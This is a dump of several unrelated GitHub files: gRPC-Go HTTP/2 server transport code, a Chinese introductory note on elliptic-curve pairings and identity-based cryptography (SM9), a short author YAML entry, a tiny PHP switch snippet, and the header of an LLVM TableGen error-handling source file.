ctx, cancel := context.WithCancel(context.Background())
t := &http2Server{
ctx: ctx,
cancel: cancel,
ctxDone: ctx.Done(),
conn: conn,
remoteAddr: conn.RemoteAddr(),
localAddr: conn.LocalAddr(),
authInfo: config.AuthInfo,
framer: framer,
readerDone: make(chan struct{}),
writerDone: make(chan struct{}),
maxStreams: maxStreams,
inTapHandle: config.InTapHandle,
fc: &trInFlow{limit: uint32(icwz)},
state: reachable,
activeStreams: make(map[uint32]*Stream),
stats: config.StatsHandler,
kp: kp,
idle: time.Now(),
kep: kep,
initialWindowSize: iwz,
czData: new(channelzData),
}
t.controlBuf = newControlBuffer(t.ctxDone)
if dynamicWindow {
t.bdpEst = &bdpEstimator{
bdp: initialWindowSize,
updateFlowControl: t.updateFlowControl,
}
}
if t.stats != nil {
t.ctx = t.stats.TagConn(t.ctx, &stats.ConnTagInfo{
RemoteAddr: t.remoteAddr,
LocalAddr: t.localAddr,
})
connBegin := &stats.ConnBegin{}
t.stats.HandleConn(t.ctx, connBegin)
}
if channelz.IsOn() {
t.channelzID = channelz.RegisterNormalSocket(t, config.ChannelzParentID, fmt.Sprintf("%s -> %s", t.remoteAddr, t.localAddr))
}
t.framer.writer.Flush()
defer func() {
if err != nil {
t.Close()
}
}()
// Check the validity of client preface.
preface := make([]byte, len(clientPreface))
if _, err := io.ReadFull(t.conn, preface); err != nil {
return nil, connectionErrorf(false, err, "transport: http2Server.HandleStreams failed to receive the preface from client: %v", err)
}
if !bytes.Equal(preface, clientPreface) {
return nil, connectionErrorf(false, nil, "transport: http2Server.HandleStreams received bogus greeting from client: %q", preface)
}
frame, err := t.framer.fr.ReadFrame()
if err == io.EOF || err == io.ErrUnexpectedEOF {
return nil, err
}
if err != nil {
return nil, connectionErrorf(false, err, "transport: http2Server.HandleStreams failed to read initial settings frame: %v", err)
}
atomic.StoreUint32(&t.activity, 1)
sf, ok := frame.(*http2.SettingsFrame)
if !ok {
return nil, connectionErrorf(false, nil, "transport: http2Server.HandleStreams saw invalid preface type %T from client", frame)
}
t.handleSettings(sf)
go func() {
t.loopy = newLoopyWriter(serverSide, t.framer, t.controlBuf, t.bdpEst)
t.loopy.ssGoAwayHandler = t.outgoingGoAwayHandler
if err := t.loopy.run(); err != nil {
errorf("transport: loopyWriter.run returning. Err: %v", err)
}
t.conn.Close()
close(t.writerDone)
}()
go t.keepalive()
return t, nil
}
// operateHeader takes action on the decoded headers.
func (t *http2Server) operateHeaders(frame *http2.MetaHeadersFrame, handle func(*Stream), traceCtx func(context.Context, string) context.Context) (fatal bool) {
streamID := frame.Header().StreamID
state := &decodeState{
serverSide: true,
}
if err := state.decodeHeader(frame); err != nil {
if se, ok := status.FromError(err); ok {
t.controlBuf.put(&cleanupStream{
streamID: streamID,
rst: true,
rstCode: statusCodeConvTab[se.Code()],
onWrite: func() {},
})
}
return false
}
buf := newRecvBuffer()
s := &Stream{
id: streamID,
st: t,
buf: buf,
fc: &inFlow{limit: uint32(t.initialWindowSize)},
recvCompress: state.data.encoding,
method: state.data.method,
contentSubtype: state.data.contentSubtype,
}
if frame.StreamEnded() {
// s is just created by the caller. No lock needed.
s.state = streamReadDone
}
if state.data.timeoutSet {
s.ctx, s.cancel = context.WithTimeout(t.ctx, state.data.timeout)
} else {
s.ctx, s.cancel = context.WithCancel(t.ctx)
}
pr := &peer.Peer{
Addr: t.remoteAddr,
}
// Attach Auth info if there is any.
if t.authInfo != nil {
pr.AuthInfo = t.authInfo
}
s.ctx = peer.NewContext(s.ctx, pr)
// Attach the received metadata to the context.
if len(state.data.mdata) > 0 {
s.ctx = metadata.NewIncomingContext(s.ctx, state.data.mdata)
}
if state.data.statsTags != nil {
s.ctx = stats.SetIncomingTags(s.ctx, state.data.statsTags)
}
if state.data.statsTrace != nil {
s.ctx = stats.SetIncomingTrace(s.ctx, state.data.statsTrace)
}
if t.inTapHandle != nil {
var err error
info := &tap.Info{
FullMethodName: state.data.method,
}
s.ctx, err = t.inTapHandle(s.ctx, info)
if err != nil {
warningf("transport: http2Server.operateHeaders got an error from InTapHandle: %v", err)
t.controlBuf.put(&cleanupStream{
streamID: s.id,
rst: true,
rstCode: http2.ErrCodeRefusedStream,
onWrite: func() {},
})
return false
}
}
t.mu.Lock()
if t.state != reachable {
t.mu.Unlock()
return false
}
if uint32(len(t.activeStreams)) >= t.maxStreams {
t.mu.Unlock()
t.controlBuf.put(&cleanupStream{
streamID: streamID,
rst: true,
rstCode: http2.ErrCodeRefusedStream,
onWrite: func() {},
})
return false
}
if streamID%2 != 1 || streamID <= t.maxStreamID {
t.mu.Unlock()
// illegal gRPC stream id.
errorf("transport: http2Server.HandleStreams received an illegal stream id: %v", streamID)
return true
}
t.maxStreamID = streamID
t.activeStreams[streamID] = s
if len(t.activeStreams) == 1 {
t.idle = time.Time{}
}
t.mu.Unlock()
if channelz.IsOn() {
atomic.AddInt64(&t.czData.streamsStarted, 1)
atomic.StoreInt64(&t.czData.lastStreamCreatedTime, time.Now().UnixNano())
}
s.requestRead = func(n int) {
t.adjustWindow(s, uint32(n))
}
s.ctx = traceCtx(s.ctx, s.method)
if t.stats != nil {
s.ctx = t.stats.TagRPC(s.ctx, &stats.RPCTagInfo{FullMethodName: s.method})
inHeader := &stats.InHeader{
FullMethod: s.method,
RemoteAddr: t.remoteAddr,
LocalAddr: t.localAddr,
Compression: s.recvCompress,
WireLength: int(frame.Header().Length),
}
t.stats.HandleRPC(s.ctx, inHeader)
}
s.ctxDone = s.ctx.Done()
s.wq = newWriteQuota(defaultWriteQuota, s.ctxDone)
s.trReader = &transportReader{
reader: &recvBufferReader{
ctx: s.ctx,
ctxDone: s.ctxDone,
recv: s.buf,
},
windowHandler: func(n int) {
t.updateWindow(s, uint32(n))
},
}
// Register the stream with loopy.
t.controlBuf.put(®isterStream{
streamID: s.id,
wq: s.wq,
})
handle(s)
return false
}
// HandleStreams receives incoming streams using the given handler. This is
// typically run in a separate goroutine.
// traceCtx attaches trace to ctx and returns the new context.
func (t *http2Server) HandleStreams(handle func(*Stream), traceCtx func(context.Context, string) context.Context) {
defer close(t.readerDone)
for {
frame, err := t.framer.fr.ReadFrame()
atomic.StoreUint32(&t.activity, 1)
if err != nil {
if se, ok := err.(http2.StreamError); ok {
warningf("transport: http2Server.HandleStreams encountered http2.StreamError: %v", se)
t.mu.Lock()
s := t.activeStreams[se.StreamID]
t.mu.Unlock()
if s != nil {
t.closeStream(s, true, se.Code, false)
} else {
t.controlBuf.put(&cleanupStream{
streamID: se.StreamID,
rst: true,
rstCode: se.Code,
onWrite: func() {},
})
}
continue
}
if err == io.EOF || err == io.ErrUnexpectedEOF {
t.Close()
return
}
warningf("transport: http2Server.HandleStreams failed to read frame: %v", err)
t.Close()
return
}
switch frame := frame.(type) {
case *http2.MetaHeadersFrame:
if t.operateHeaders(frame, handle, traceCtx) {
t.Close()
break
}
case *http2.DataFrame:
t.handleData(frame)
case *http2.RSTStreamFrame:
t.handleRSTStream(frame)
case *http2.SettingsFrame:
t.handleSettings(frame)
case *http2.PingFrame:
t.handlePing(frame)
case *http2.WindowUpdateFrame:
t.handleWindowUpdate(frame)
case *http2.GoAwayFrame:
// TODO: Handle GoAway from the client appropriately.
default:
errorf("transport: http2Server.HandleStreams found unhandled frame type %v.", frame)
}
}
}
func (t *http2Server) getStream(f http2.Frame) (*Stream, bool) {
t.mu.Lock()
defer t.mu.Unlock()
if t.activeStreams == nil {
// The transport is closing.
return nil, false
}
s, ok := t.activeStreams[f.Header().StreamID]
if !ok {
// The stream is already done.
return nil, false
}
return s, true
}
// adjustWindow sends out extra window update over the initial window size
// of stream if the application is requesting data larger in size than
// the window.
func (t *http2Server) adjustWindow(s *Stream, n uint32) {
if w := s.fc.maybeAdjust(n); w > 0 {
t.controlBuf.put(&outgoingWindowUpdate{streamID: s.id, increment: w})
}
}
// updateWindow adjusts the inbound quota for the stream and the transport.
// Window updates will deliver to the controller for sending when
// the cumulative quota exceeds the corresponding threshold.
func (t *http2Server) updateWindow(s *Stream, n uint32) {
if w := s.fc.onRead(n); w > 0 {
t.controlBuf.put(&outgoingWindowUpdate{streamID: s.id,
increment: w,
})
}
}
// updateFlowControl updates the incoming flow control windows
// for the transport and the stream based on the current bdp
// estimation.
func (t *http2Server) updateFlowControl(n uint32) {
t.mu.Lock()
for _, s := range t.activeStreams {
s.fc.newLimit(n)
}
t.initialWindowSize = int32(n)
t.mu.Unlock()
t.controlBuf.put(&outgoingWindowUpdate{
streamID: 0,
increment: t.fc.newLimit(n),
})
t.controlBuf.put(&outgoingSettings{
ss: []http2.Setting{
{
ID: http2.SettingInitialWindowSize,
Val: n,
},
},
})
}
func (t *http2Server) handleData(f *http2.DataFrame) {
size := f.Header().Length
var sendBDPPing bool
if t.bdpEst != nil {
sendBDPPing = t.bdpEst.add(size)
}
// Decouple connection's flow control from application's read.
// An update on connection's flow control should not depend on
// whether user application has read the data or not. Such a
// restriction is already imposed on the stream's flow control,
// and therefore the sender will be blocked anyways.
// Decoupling the connection flow control will prevent other
// active(fast) streams from starving in presence of slow or
// inactive streams.
if w := t.fc.onData(size); w > 0 {
t.controlBuf.put(&outgoingWindowUpdate{
streamID: 0,
increment: w,
})
}
if sendBDPPing {
// Avoid excessive ping detection (e.g. in an L7 proxy)
// by sending a window update prior to the BDP ping.
if w := t.fc.reset(); w > 0 {
t.controlBuf.put(&outgoingWindowUpdate{
streamID: 0,
increment: w,
})
}
t.controlBuf.put(bdpPing)
}
// Select the right stream to dispatch.
s, ok := t.getStream(f)
if !ok {
return
}
if size > 0 {
if err := s.fc.onData(size); err != nil {
t.closeStream(s, true, http2.ErrCodeFlowControl, false)
return
}
if f.Header().Flags.Has(http2.FlagDataPadded) {
if w := s.fc.onRead(size - uint32(len(f.Data()))); w > 0 {
t.controlBuf.put(&outgoingWindowUpdate{s.id, w})
}
}
// TODO(bradfitz, zhaoq): A copy is required here because there is no
// guarantee f.Data() is consumed before the arrival of next frame.
// Can this copy be eliminated?
if len(f.Data()) > 0 {
data := make([]byte, len(f.Data()))
copy(data, f.Data())
s.write(recvMsg{data: data})
}
}
if f.Header().Flags.Has(http2.FlagDataEndStream) {
// Received the end of stream from the client.
s.compareAndSwapState(streamActive, streamReadDone)
s.write(recvMsg{err: io.EOF})
}
}
func (t *http2Server) handleRSTStream(f *http2.RSTStreamFrame) {
// If the stream is not deleted from the transport's active streams map, then do a regular close stream.
if s, ok := t.getStream(f); ok {
t.closeStream(s, false, 0, false)
return
}
// If the stream is already deleted from the active streams map, then put a cleanupStream item into controlbuf to delete the stream from loopy writer's established streams map.
t.controlBuf.put(&cleanupStream{
streamID: f.Header().StreamID,
rst: false,
rstCode: 0,
onWrite: func() {},
})
}
func (t *http2Server) handleSettings(f *http2.SettingsFrame) {
if f.IsAck() {
return
}
var ss []http2.Setting
var updateFuncs []func()
f.ForeachSetting(func(s http2.Setting) error {
switch s.ID {
case http2.SettingMaxHeaderListSize:
updateFuncs = append(updateFuncs, func() {
t.maxSendHeaderListSize = new(uint32)
*t.maxSendHeaderListSize = s.Val
})
default:
ss = append(ss, s)
}
return nil
})
t.controlBuf.executeAndPut(func(interface{}) bool {
for _, f := range updateFuncs {
f()
}
return true
}, &incomingSettings{
ss: ss,
})
}
const (
maxPingStrikes = 2
defaultPingTimeout = 2 * time.Hour
)
func (t *http2Server) handlePing(f *http2.PingFrame) {
if f.IsAck() {
if f.Data == goAwayPing.data && t.drainChan != nil {
close(t.drainChan)
return
}
// Maybe it's a BDP ping.
if t.bdpEst != nil {
t.bdpEst.calculate(f.Data)
}
return
}
pingAck := &ping{ack: true}
copy(pingAck.data[:], f.Data[:])
t.controlBuf.put(pingAck)
now := time.Now()
defer func() {
t.lastPingAt = now
}()
// A reset ping strikes means that we don't need to check for policy
// violation for this ping and the pingStrikes counter should be set
// to 0.
if atomic.CompareAndSwapUint32(&t.resetPingStrikes, 1, 0) {
t.pingStrikes = 0
return
}
t.mu.Lock()
ns := len(t.activeStreams)
t.mu.Unlock()
if ns < 1 && !t.kep.PermitWithoutStream {
// Keepalive shouldn't be active thus, this new ping should
// have come after at least defaultPingTimeout.
if t.lastPingAt.Add(defaultPingTimeout).After(now) {
t.pingStrikes++
}
} else {
// Check if keepalive policy is respected.
if t.lastPingAt.Add(t.kep.MinTime).After(now) {
t.pingStrikes++
}
}
if t.pingStrikes > maxPingStrikes {
// Send goaway and close the connection.
errorf("transport: Got too many pings from the client, closing the connection.")
t.controlBuf.put(&goAway{code: http2.ErrCodeEnhanceYourCalm, debugData: []byte("too_many_pings"), closeConn: true})
}
}
func (t *http2Server) handleWindowUpdate(f *http2.WindowUpdateFrame) {
t.controlBuf.put(&incomingWindowUpdate{
streamID: f.Header().StreamID,
increment: f.Increment,
})
}
func appendHeaderFieldsFromMD(headerFields []hpack.HeaderField, md metadata.MD) []hpack.HeaderField {
for k, vv := range md {
if isReservedHeader(k) {
// Clients don't tolerate reading restricted headers after some non restricted ones were sent.
continue
}
for _, v := range vv {
headerFields = append(headerFields, hpack.HeaderField{Name: k, Value: encodeMetadataHeader(k, v)})
}
}
return headerFields
}
func (t *http2Server) checkForHeaderListSize(it interface{}) bool {
if t.maxSendHeaderListSize == nil {
return true
}
hdrFrame := it.(*headerFrame)
var sz int64
for _, f := range hdrFrame.hf {
if sz += int64(f.Size()); sz > int64(*t.maxSendHeaderListSize) {
errorf("header list size to send violates the maximum size (%d bytes) set by client", *t.maxSendHeaderListSize)
return false
}
}
return true
}
// WriteHeader sends the header metedata md back to the client.
func (t *http2Server) WriteHeader(s *Stream, md metadata.MD) error {
if s.updateHeaderSent() || s.getState() == streamDone {
return ErrIllegalHeaderWrite
}
s.hdrMu.Lock()
if md.Len() > 0 {
if s.header.Len() > 0 {
s.header = metadata.Join(s.header, md)
} else {
s.header = md
}
}
if err := t.writeHeaderLocked(s); err != nil {
s.hdrMu.Unlock()
return err
}
s.hdrMu.Unlock()
return nil
}
func (t *http2Server) writeHeaderLocked(s *Stream) error {
// TODO(mmukhi): Benchmark if the performance gets better if count the metadata and other header fields
// first and create a slice of that exact size.
headerFields := make([]hpack.HeaderField, 0, 2) // at least :status, content-type will be there if none else.
headerFields = append(headerFields, hpack.HeaderField{Name: ":status", Value: "200"})
headerFields = append(headerFields, hpack.HeaderField{Name: "content-type", Value: contentType(s.contentSubtype)})
if s.sendCompress != "" {
headerFields = append(headerFields, hpack.HeaderField{Name: "grpc-encoding", Value: s.sendCompress})
}
headerFields = appendHeaderFieldsFromMD(headerFields, s.header)
success, err := t.controlBuf.executeAndPut(t.checkForHeaderListSize, &headerFrame{
streamID: s.id,
hf: headerFields,
endStream: false,
onWrite: func() {
atomic.StoreUint32(&t.resetPingStrikes, 1)
},
})
if !success {
if err != nil {
return err
}
t.closeStream(s, true, http2.ErrCodeInternal, false)
return ErrHeaderListSizeLimitViolation
}
if t.stats != nil {
// Note: WireLength is not set in outHeader.
// TODO(mmukhi): Revisit this later, if needed.
outHeader := &stats.OutHeader{}
t.stats.HandleRPC(s.Context(), outHeader)
}
return nil
}
// WriteStatus sends stream status to the client and terminates the stream.
// There is no further I/O operations being able to perform on this stream.
// TODO(zhaoq): Now it indicates the end of entire stream. Revisit if early
// OK is adopted.
func (t *http2Server) WriteStatus(s *Stream, st *status.Status) error {
if s.getState() == streamDone {
return nil
}
s.hdrMu.Lock()
// TODO(mmukhi): Benchmark if the performance gets better if count the metadata and other header fields
// first and create a slice of that exact size.
headerFields := make([]hpack.HeaderField, 0, 2) // grpc-status and grpc-message will be there if none else.
if !s.updateHeaderSent() { // No headers have been sent.
if len(s.header) > 0 { // Send a separate header frame.
if err := t.writeHeaderLocked(s); err != nil {
s.hdrMu.Unlock()
return err
}
} else { // Send a trailer only response.
headerFields = append(headerFields, hpack.HeaderField{Name: ":status", Value: "200"})
headerFields = append(headerFields, hpack.HeaderField{Name: "content-type", Value: contentType(s.contentSubtype)})
}
}
headerFields = append(headerFields, hpack.HeaderField{Name: "grpc-status", Value: strconv.Itoa(int(st.Code()))})
headerFields = append(headerFields, hpack.HeaderField{Name: "grpc-message", Value: encodeGrpcMessage(st.Message())})
if p := st.Proto(); p != nil && len(p.Details) > 0 {
stBytes, err := proto.Marshal(p)
if err != nil {
// TODO: return error instead, when callers are able to handle it.
grpclog.Errorf("transport: failed to marshal rpc status: %v, error: %v", p, err)
} else {
headerFields = append(headerFields, hpack.HeaderField{Name: "grpc-status-details-bin", Value: encodeBinHeader(stBytes)})
}
}
// Attach the trailer metadata.
headerFields = appendHeaderFieldsFromMD(headerFields, s.trailer)
trailingHeader := &headerFrame{
streamID: s.id,
hf: headerFields,
endStream: true,
onWrite: func() {
atomic.StoreUint32(&t.resetPingStrikes, 1)
},
}
s.hdrMu.Unlock()
success, err := t.controlBuf.execute(t.checkForHeaderListSize, trailingHeader)
if !success {
if err != nil {
return err
}
t.closeStream(s, true, http2.ErrCodeInternal, false)
return ErrHeaderListSizeLimitViolation
}
// Send a RST_STREAM after the trailers if the client has not already half-closed.
rst := s.getState() == streamActive
t.finishStream(s, rst, http2.ErrCodeNo, trailingHeader, true)
if t.stats != nil {
t.stats.HandleRPC(s.Context(), &stats.OutTrailer{})
}
return nil
}
// Write converts the data into HTTP2 data frame and sends it out. Non-nil error
// is returns if it fails (e.g., framing error, transport error).
func (t *http2Server) Write(s *Stream, hdr []byte, data []byte, opts *Options) error {
if !s.isHeaderSent() { // Headers haven't been written yet.
if err := t.WriteHeader(s, nil); err != nil {
if _, ok := err.(ConnectionError); ok {
return err
}
// TODO(mmukhi, dfawley): Make sure this is the right code to return.
return status.Errorf(codes.Internal, "transport: %v", err)
}
} else {
// Writing headers checks for this condition.
if s.getState() == streamDone {
// TODO(mmukhi, dfawley): Should the server write also return io.EOF?
s.cancel()
select {
case <-t.ctx.Done():
return ErrConnClosing
default:
}
return ContextErr(s.ctx.Err())
}
}
// Add some data to header frame so that we can equally distribute bytes across frames.
emptyLen := http2MaxFrameLen - len(hdr)
if emptyLen > len(data) {
emptyLen = len(data)
}
hdr = append(hdr, data[:emptyLen]...)
data = data[emptyLen:]
df := &dataFrame{
streamID: s.id,
h: hdr,
d: data,
onEachWrite: func() {
atomic.StoreUint32(&t.resetPingStrikes, 1)
},
}
if err := s.wq.get(int32(len(hdr) + len(data))); err != nil {
select {
case <-t.ctx.Done():
return ErrConnClosing
default:
}
return ContextErr(s.ctx.Err())
}
return t.controlBuf.put(df)
}
// keepalive running in a separate goroutine does the following:
// 1. Gracefully closes an idle connection after a duration of keepalive.MaxConnectionIdle.
// 2. Gracefully closes any connection after a duration of keepalive.MaxConnectionAge.
// 3. Forcibly closes a connection after an additive period of keepalive.MaxConnectionAgeGrace over keepalive.MaxConnectionAge.
// 4. Makes sure a connection is alive by sending pings with a frequency of keepalive.Time and closes a non-responsive connection
// after an additional duration of keepalive.Timeout.
func (t *http2Server) keepalive() {
p := &ping{}
var pingSent bool
maxIdle := time.NewTimer(t.kp.MaxConnectionIdle)
maxAge := time.NewTimer(t.kp.MaxConnectionAge)
keepalive := time.NewTimer(t.kp.Time)
// NOTE: All exit paths of this function should reset their
// respective timers. A failure to do so will cause the
// following clean-up to deadlock and eventually leak.
defer func() {
if !maxIdle.Stop() {
<-maxIdle.C
}
if !maxAge.Stop() {
<-maxAge.C
}
if !keepalive.Stop() {
<-keepalive.C
}
}()
for {
select {
case <-maxIdle.C:
t.mu.Lock()
idle := t.idle
if idle.IsZero() { // The connection is non-idle.
t.mu.Unlock()
maxIdle.Reset(t.kp.MaxConnectionIdle)
continue
}
val := t.kp.MaxConnectionIdle - time.Since(idle)
t.mu.Unlock()
if val <= 0 {
// The connection has been idle for a duration of keepalive.MaxConnectionIdle or more.
// Gracefully close the connection.
t.drain(http2.ErrCodeNo, []byte{})
// Resetting the timer so that the clean-up doesn't deadlock.
maxIdle.Reset(infinity)
return
}
maxIdle.Reset(val)
case <-maxAge.C:
t.drain(http2.ErrCodeNo, []byte{})
maxAge.Reset(t.kp.MaxConnectionAgeGrace)
select {
case <-maxAge.C:
// Close the connection after grace period.
t.Close()
// Resetting the timer so that the clean-up doesn't deadlock.
maxAge.Reset(infinity)
case <-t.ctx.Done():
}
return
case <-keepalive.C:
if atomic.CompareAndSwapUint32(&t.activity, 1, 0) {
pingSent = false
keepalive.Reset(t.kp.Time)
continue
}
if pingSent {
t.Close()
// Resetting the timer so that the clean-up doesn't deadlock.
keepalive.Reset(infinity)
return
}
pingSent = true
if channelz.IsOn() {
atomic.AddInt64(&t.czData.kpCount, 1)
}
t.controlBuf.put(p)
keepalive.Reset(t.kp.Timeout)
case <-t.ctx.Done():
return
}
}
}
// Close starts shutting down the http2Server transport.
// TODO(zhaoq): Now the destruction is not blocked on any pending streams. This
// could cause some resource issue. Revisit this later.
func (t *http2Server) Close() error {
t.mu.Lock()
if t.state == closing {
t.mu.Unlock()
return errors.New("transport: Close() was already called")
}
t.state = closing
streams := t.activeStreams
t.activeStreams = nil
t.mu.Unlock()
t.controlBuf.finish()
t.cancel()
err := t.conn.Close()
if channelz.IsOn() {
channelz.RemoveEntry(t.channelzID)
}
// Cancel all active streams.
for _, s := range streams {
s.cancel()
}
if t.stats != nil {
connEnd := &stats.ConnEnd{}
t.stats.HandleConn(t.ctx, connEnd)
}
return err
}
// deleteStream deletes the stream s from transport's active streams.
func (t *http2Server) deleteStream(s *Stream, eosReceived bool) (oldState streamState) {
oldState = s.swapState(streamDone)
if oldState == streamDone {
// If the stream was already done, return.
return oldState
}
// In case stream sending and receiving are invoked in separate
// goroutines (e.g., bi-directional streaming), cancel needs to be
// called to interrupt the potential blocking on other goroutines.
s.cancel()
t.mu.Lock()
if _, ok := t.activeStreams[s.id]; ok {
delete(t.activeStreams, s.id)
if len(t.activeStreams) == 0 {
t.idle = time.Now()
}
}
t.mu.Unlock()
if channelz.IsOn() {
if eosReceived {
atomic.AddInt64(&t.czData.streamsSucceeded, 1)
} else {
atomic.AddInt64(&t.czData.streamsFailed, 1)
}
}
return oldState
}
// finishStream closes the stream and puts the trailing headerFrame into controlbuf.
func (t *http2Server) finishStream(s *Stream, rst bool, rstCode http2.ErrCode, hdr *headerFrame, eosReceived bool) {
oldState := t.deleteStream(s, eosReceived)
// If the stream is already closed, then don't put trailing header to controlbuf.
if oldState == streamDone {
return
}
hdr.cleanup = &cleanupStream{
streamID: s.id,
rst: rst,
rstCode: rstCode,
onWrite: func() {},
}
t.controlBuf.put(hdr)
}
// closeStream clears the footprint of a stream when the stream is not needed any more.
func (t *http2Server) closeStream(s *Stream, rst bool, rstCode http2.ErrCode, eosReceived bool) {
t.deleteStream(s, eosReceived)
t.controlBuf.put(&cleanupStream{
streamID: s.id,
rst: rst,
rstCode: rstCode,
onWrite: func() {},
})
}
func (t *http2Server) RemoteAddr() net.Addr {
return t.remoteAddr
}
func (t *http2Server) Drain() {
t.drain(http2.ErrCodeNo, []byte{})
}
func (t *http2Server) drain(code http2.ErrCode, debugData []byte) {
t.mu.Lock()
defer t.mu.Unlock()
if t.drainChan != nil {
return
}
t.drainChan = make(chan struct{})
t.controlBuf.put(&goAway{code: code, debugData: debugData, headsUp: true})
}
var goAwayPing = &ping{data: [8]byte{1, 6, 1, 8, 0, 3, 3, 9}}
// Handles outgoing GoAway and returns true if loopy needs to put itself
// in draining mode.
func (t *http2Server) outgoingGoAwayHandler(g *goAway) (bool, error) {
t.mu.Lock()
if t.state == closing { // TODO(mmukhi): This seems unnecessary.
t.mu.Unlock()
// The transport is closing.
return false, ErrConnClosing
}
sid := t.maxStreamID
if !g.headsUp {
// Stop accepting more streams now.
t.state = draining
if len(t.activeStreams) == 0 {
g.closeConn = true
}
t.mu.Unlock()
if err := t.framer.fr.WriteGoAway(sid, g.code, g.debugData); err != nil {
return false, err
}
if g.closeConn {
// Abruptly close the connection following the GoAway (via
// loopywriter). But flush out what's inside the buffer first.
t.framer.writer.Flush()
return false, fmt.Errorf("transport: Connection closing")
}
return true, nil
}
t.mu.Unlock()
// For a graceful close, send out a GoAway with stream ID of MaxUInt32,
// Follow that with a ping and wait for the ack to come back or a timer
// to expire. During this time accept new streams since they might have
// originated before the GoAway reaches the client.
// After getting the ack or timer expiration send out another GoAway this
// time with an ID of the max stream server intends to process.
if err := t.framer.fr.WriteGoAway(math.MaxUint32, http2.ErrCodeNo, []byte{}); err != nil {
return false, err
}
if err := t.framer.fr.WritePing(false, goAwayPing.data); err != nil {
return false, err
}
go func() {
timer := time.NewTimer(time.Minute)
defer timer.Stop()
select {
case <-t.drainChan:
case <-timer.C:
case <-t.ctx.Done():
return
}
t.controlBuf.put(&goAway{code: g.code, debugData: g.debugData})
}()
return false, nil
}
func (t *http2Server) ChannelzMetric() *channelz.SocketInternalMetric {
s := channelz.SocketInternalMetric{
StreamsStarted: atomic.LoadInt64(&t.czData.streamsStarted),
StreamsSucceeded: atomic.LoadInt64(&t.czData.streamsSucceeded),
StreamsFailed: atomic.LoadInt64(&t.czData.streamsFailed),
MessagesSent: atomic.LoadInt64(&t.czData.msgSent),
MessagesReceived: atomic.LoadInt64(&t.czData.msgRecv),
KeepAlivesSent: atomic.LoadInt64(&t.czData.kpCount),
LastRemoteStreamCreatedTimestamp: time.Unix(0, atomic.LoadInt64(&t.czData.lastStreamCreatedTime)),
LastMessageSentTimestamp: time.Unix(0, atomic.LoadInt64(&t.czData.lastMsgSentTime)),
LastMessageReceivedTimestamp: time.Unix(0, atomic.LoadInt64(&t.czData.lastMsgRecvTime)),
LocalFlowControlWindow: int64(t.fc.getSize()),
SocketOptions: channelz.GetSocketOption(t.conn),
LocalAddr: t.localAddr,
RemoteAddr: t.remoteAddr,
// RemoteName :
}
if au, ok := t.authInfo.(credentials.ChannelzSecurityInfo); ok {
s.Security = au.GetSecurityValue()
}
s.RemoteFlowControlWindow = t.getOutFlowWindow()
return &s
}
func (t *http2Server) IncrMsgSent() {
atomic.AddInt64(&t.czData.msgSent, 1)
atomic.StoreInt64(&t.czData.lastMsgSentTime, time.Now().UnixNano())
}
func (t *http2Server) IncrMsgRecv() {
atomic.AddInt64(&t.czData.msgRecv, 1)
atomic.StoreInt64(&t.czData.lastMsgRecvTime, time.Now().UnixNano())
}
func (t *http2Server) getOutFlowWindow() int64 {
resp := make(chan uint32, 1)
timer := time.NewTimer(time.Second)
defer timer.Stop()
t.controlBuf.put(&outFlowControlSizeRequest{resp})
select {
case sz := <-resp:
return int64(sz)
case <-t.ctxDone:
return -1
case <-timer.C:
return -2
}
}
func getJitter(v time.Duration) time.Duration {
if v == infinity {
return 0
}
// Generate a jitter between +/- 10% of the value.
r := int64(v / 10)
j := grpcrand.Int63n(2*r) - r
return time.Duration(j)
}
| {
"pile_set_name": "Github"
} |
# pairing的初步
## 一、ECC pairing的介绍
在前面提到了RSA ACC累加器,它的缺点是需要不断的重复进行运算证明,速度还是是一个硬伤。这时就有人提出了Pairing:二元映射。特别是基于ECC Pairing,效率更好。
</br>
不过在刚刚提出这个算法时,e(P,Q)的计算量也是巨大的,所以不言而喻。但随着谷歌等一些公司的投入和大牛们的不断的努力,运算的时间已经从几分钟缩减到微秒级。
</br>
2008年,Vercauteren提出了最优Ate Pairing,这个是目前知道的最快的算法。
## 二、标识密码体系(IBC)和应用
在传统的PKI加密体系中,需要公开一个公钥和自己保密一个私钥。但是在传送公钥时,很有可能出现问题,此时提出了CA认证。但是这玩意儿一个是太复杂,另外需要额外维护一个中心化的节点,一但出问题也就有问题了。
</br>
为了解决这个问题,以色列密码学家在1984年提出了标识密码体系。即不再使用上述的方式来生成公私钥对,而是由客户标识如:姓名、IP、手机号以及邮箱等来作为公钥。私钥则由密钥中心依据系统主密钥和用户标识计算得出。直到2000年,业界提出基于椭圆曲线数学难题的配对构造算法(即上面第一节的介绍),才解决了这个根本的问题。
</br>
在我国,2008年将其引入到国密的SM9中,目前在这方面的研究工作还是有很多人在推进。网上可以找到N多SM9的实现的算法,包括各个科研机构中开源的相关c++的源码。
## 三、主要原理
IBC密码体系主要有三块:
</br>
1)IBE加解密算法组:
</br>
其基本的步骤为:生成系统参数和主密钥并保管好,其中系统参数是公开的;然后利用这二者和用户身份标识生成私钥,当然,标识即为公钥;利用系统和公钥对相关数据进行加密,得到密文;然后相关方利用系统参数和私钥解密。
2)IBS签名算法组:
</br>
签名类似,不同点在于用私钥和系统参数产生签名,然后用此签名和系统参数及公钥验证。原理和普通的PKI体系没有太大不同。
3)IBKA身份认证协议:
</br>
认证的协议首先由发起方生成一个随机数和时间戳,发送给认证方;认证方通过随机数和时间戳生成待签报文,用私钥生成数字签名发回给发起方;发起方利用认证方的公钥对数字签名进行验证。
</br>
IBC的优势在于运算数据小,成本低,不需要第三方,但是目前看来这个技术还在发展中,不能说其可以完全替代PIK体系。
## 四、区块链上的应用
在区块链上的应用也和RSA ACC类似,正处于研究阶段,也是用来对相关的验证数据进行替代,目前真正商用的还没有看到,研究的倒是出现了一些。
## 五、总结
加密体系是一个比较深的东西,对一些原理和算法的过程理解需要不断的完善,欢迎指正。
| {
"pile_set_name": "Github"
} |
sortName: Lozano
displayName: Ruben Lozano
url: https://rubenlozano.com | {
"pile_set_name": "Github"
} |
<?php
switch($a) {
case substr($b, 0, 1) == 'c':
d($e['f'], 'g');
}
?> | {
"pile_set_name": "Github"
} |
//===- Error.cpp - tblgen error handling helper routines --------*- C++ -*-===//
//
// The LLVM Compiler Infrastructure
//
// This file is distributed under the University of Illinois Open Source
// License. See LICENSE.TXT for details.
//
//===----------------------------------------------------------------------===//
//
// This file contains error handling helper routines to pretty-print diagnostic
// messages from tblgen.
//
//===----------------------------------------------------------------------===//
#include "llvm/TableGen/Error.h"
#include "llvm/ADT/Twine.h"
#include "llvm/Support/Signals.h"
